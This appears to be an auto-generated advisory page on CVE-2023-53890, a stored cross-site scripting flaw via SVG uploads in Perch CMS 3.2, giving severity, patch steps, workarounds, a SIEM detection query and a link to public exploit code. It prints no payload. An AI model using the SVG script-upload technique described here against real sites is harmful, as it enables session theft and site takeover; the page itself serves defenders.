CVE-2023-53890 – Perch CMS 3.2 contains a stored cross-site scri... (How to Fix)

Q: What is the severity of CVE-2023-53890?

CVE-2023-53890 has a CVSS score of 5.4 (MEDIUM). Perch CMS 3.2 contains a stored cross-site scripting vulnerability where authenticated users can upload malicious SVG files containing JavaScript. When these files are viewed, the embedded scripts execute in victims' browsers, potentially stealing session cookies or performing other client-side attacks. This affects all Perch CMS 3.2 installations with file upload functionality enabled.

📋 TL;DR

Perch CMS 3.2 contains a stored cross-site scripting vulnerability where authenticated users can upload malicious SVG files containing JavaScript. When these files are viewed, the embedded scripts execute in victims' browsers, potentially stealing session cookies or performing other client-side attacks. This affects all Perch CMS 3.2 installations with file upload functionality enabled.

💻 Affected Systems

Products:

Perch CMS

Versions: 3.2

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Requires authenticated user with file upload permissions. SVG file upload functionality must be enabled.

📦 What is this software?

Perch by Grabaperch

View all CVEs affecting Perch →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator session cookies, gain full control of the CMS, deface websites, or redirect users to malicious sites.

🟠

Likely Case

Authenticated users with upload privileges could embed tracking scripts, steal other users' session data, or perform limited client-side attacks.

🟢

If Mitigated

With proper input validation and content security policies, the impact is limited to visual defacement without script execution.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploit requires authenticated access but is trivial to execute once authenticated. Public exploit code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.2.1

Vendor Advisory: https://grabaperch.com/

Restart Required: No

Instructions:

1. Backup your Perch CMS installation. 2. Download Perch CMS 3.2.1 from the official website. 3. Replace the existing installation files with the patched version. 4. Clear any cached files or assets.

🔧 Temporary Workarounds

Disable SVG file uploads

all

Configure Perch CMS to reject SVG file uploads entirely

Edit Perch configuration to remove SVG from allowed file types

Implement Content Security Policy

all

Add CSP headers to prevent inline script execution from uploaded files

Add 'Content-Security-Policy: default-src 'self'; script-src 'self'' to web server configuration

🧯 If You Can't Patch

Restrict file upload permissions to trusted administrators only
Implement web application firewall rules to block SVG files containing script tags

🔍 How to Verify

Check if Vulnerable:

Check if running Perch CMS version 3.2 and test if SVG files with embedded JavaScript can be uploaded and executed

Check Version:

Check Perch admin dashboard or examine perch/core/version.php file

Verify Fix Applied:

Verify installation shows version 3.2.1 and test that SVG files with script tags are either rejected or scripts don't execute

📡 Detection & Monitoring

Log Indicators:

Unusual SVG file uploads
Multiple failed upload attempts with SVG files
Admin user uploading files from unusual IP addresses

Network Indicators:

HTTP POST requests uploading SVG files
Requests to uploaded SVG files followed by suspicious outbound connections

SIEM Query:

source="web_logs" AND (uri_path="*.svg" OR file_extension="svg") AND http_method="POST"

📊 Metadata

CVE ID: CVE-2023-53890

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (9.3th percentile)

Published: December 15, 2025

Last Updated: January 23, 2026

🔗 References

https://grabaperch.com/ Product
https://www.exploit-db.com/exploits/51621 Exploit
https://www.vulncheck.com/advisories/perch-cms-stored-cross-site-scripting-via-svg-file-upload Third Party Advisory
https://www.exploit-db.com/exploits/51621 Exploit

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-53890, you might also want to check these: